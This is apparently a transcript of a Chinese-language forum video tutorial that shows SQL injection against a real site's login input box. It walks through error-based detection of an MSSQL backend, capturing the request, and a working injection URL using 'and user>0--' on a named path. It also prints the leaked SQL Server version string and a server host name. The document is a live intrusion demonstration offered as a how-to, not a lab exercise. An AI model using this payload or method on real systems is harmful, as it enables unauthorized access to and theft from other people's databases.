好 今天来演示一下输入框注入 咋们这一次的输入框注入不是普通的那种 看我演示就知道了
地址我找好了 来看吧 看我演示
看到了吧 对不起 非法 嘿嘿 可能看到这里 有些朋友就放弃了 我们在仔细看一下
有一个查看用户是否存在 嘿嘿
点击一下试试
看到了吧? 嘿嘿 报错了 mssql数据库 一看就知道
接下来当然是抓包了 好放在工具里边跑 或者手工注入
看我演示
有点卡 哈
看到了吧 抓包了 有时候如果抓到的是空白 我们就直接选择 =下说这个问题 先把数据拿出来
/login_hot/usercenter/selectuser.aspx?username='and%20user>0--
这就是地址了
现在接着说 有时候抓到是空白怎么办
我们别选这种 直接选IExplore.exe这种
这样就可以避免有时候抓不到东西的问题 OK 我们来试试注入点
'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2)
'HP-DS-OTH02'
好了 放工具里边试试
可以注入 好了 再见
大家别再来干这个站了 谢谢
(附件)
本帖包含的部分附件只能 访问 社区查看